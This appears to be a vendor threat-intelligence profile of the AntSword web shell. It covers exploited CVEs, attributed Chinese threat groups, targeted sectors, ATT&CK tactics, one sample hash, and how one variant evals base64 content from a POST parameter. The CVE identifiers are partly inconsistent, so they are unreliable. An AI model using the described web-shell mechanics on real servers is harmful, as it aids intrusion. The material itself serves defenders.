AntSword
AntSword is an open-source Chinese web shell and web shell management framework used to manage compromised web servers and provide backdoor access. The content describes it as similar to China Chopper and notes it can be used to send commands from an attacker-controlled system to a compromised host, including through a virtual terminal. It has been observed deployed on IIS and other web servers after exploitation of internet-facing applications and vulnerabilities, including exposed phpMyAdmin instances, misconfigured web servers, Trimble Cityworks exploitation, SharePoint exploitation, and attacks exploiting SharePoint flaws CVE-2025-49706 and CVE-2025-53770. Reported post-compromise use includes command execution, persistence, lateral movement to additional hosts and SQL servers, and support for staging or exfiltration of data.
The malware/tool has been associated in reporting with multiple China-nexus intrusion sets and campaigns, including APT41/DUST, APT15, Cisco Talos-tracked UAT-6382, and Unit 42-tracked CL-UNK-1068. In these contexts it was used alongside other web shells and malware such as China Chopper, Behinder, Godzilla, BLUEBEAM, Ghost RAT/Gh0st RAT, DUSTPAN, BEACON, FRP, and Xnote. Targeting described in the content includes local governing bodies in the United States, Middle Eastern government organizations, and organizations across aviation, energy, government, law enforcement, pharmaceutical, technology, and telecommunications sectors in South, Southeast, and East Asia. High-confidence artifacts and behaviors mentioned include AntSword web shells written with English and Simplified Chinese messaging, operation through AntSword Shell Manager or AntSword virtual terminal, and one observed AntSword variant deployed as bitreeview.aspx that executed base64-decoded content from an HTTP POST parameter named Darr1R1ng via JScript eval. In one SharePoint case, the sample hash for the AntSword web shell was SHA256 15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Cisco Talos has observed exploitation of CVE-2025-0994, a remote-code-execution vulnerability in Cityworks, a popular asset management system. The Cybersecurity and Infrastructure Security Agency (CISA) and Trimble have both released advisories pertaining to this vulnerability... | Post-compromise activity involves the rapid deployment of web shells such as AntSword and chinatso/Chopper on the underlying IIS web servers.
Talos has found intrusions in enterprise networks of local governing bodies in the United States (U.S.), beginning January 2025 when initial exploitation first took place. UAT-6382 successfully exploited CVE-2025-0944, conducted reconnaissance and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access.
Observed unknown threat actors exploiting a vulnerability in SharePoint described in CVE-2019-0604 to install several webshells on the website of a Middle East government organization... publicly available exploit code suggests that CVE-2019-0604 is still a major attack vector. | "One of these webshells is the open source AntSword webshell freely available on Github, which is remarkably similar to the infamous China Chopper webshell."
"...a signature trait of C2 tools like China Chopper or AntSword."
Groups observed using it
8 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Post-compromise activity involves the rapid deployment of web shells such as AntSword and chinatso/Chopper on the underlying IIS web servers.
Initial access facilitated by an internet-exposed phpMyAdmin panel enabled attackers to access the server SQL query interface and execute multiple SQL commands, resulting in the deployment of the ANTSWORD web shell.
Huntress said Nezha was used in tandem with other families of malware and web shell management tools, such as Ghost RAT and AntSword. One of the first clues leading them to attribute the incident to Chinese actors was that, upon accessing the administrative interface of the compromised system, the hacker set the language to simplified Chinese. Minton added that even though Huntress stopped short of formally attributing the campaign to a specific Chinese threat actor, the use of Ghost RAT and AntSword was a clue because they both have been used before in activity publicly attributed to Chinese APT groups.
Huntress reported attackers “gaining control of target servers via the AntSword web shell.”
"...moved to issue commands via AntSword’s virtual terminal. AntSword is an open-source Chinese web shell management framework... to manage compromised web servers."
"One of these webshells is the open source AntSword webshell freely available on Github, which is remarkably similar to the infamous China Chopper webshell."
Techniques & procedures
7 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Initial Access
Execution
1 technique
Execution
Persistence
1 technique
Persistence
Discovery
1 technique
Discovery
Command and Control
3 techniques
Command and Control
Each of these POST requests represents the attacker’s C2 server sending instructions to the compromised web server via the deployed web shell.
The access afforded by the ANTSWORD web shell is then used to run the "whoami" command to determine the privileges of the web server and deliver the open-source Nezha agent
The access afforded by the ANTSWORD web shell is then used to run the "whoami" command to determine the privileges of the web server and deliver the open-source Nezha agent, which can be used to remotely commandeer an infected host by connecting to an external server
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A web shell used by the Chinese threat cluster CL-UNK-1068 after initial compromise to move laterally to additional hosts and SQL servers.
Webshell used to maintain access and conduct post-exploitation actions such as lateral movement and data theft/exfiltration.
Web shell used for command execution and persistence on compromised web servers.
A web shell management tool used to control web shells on compromised servers and support post-exploitation operations.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.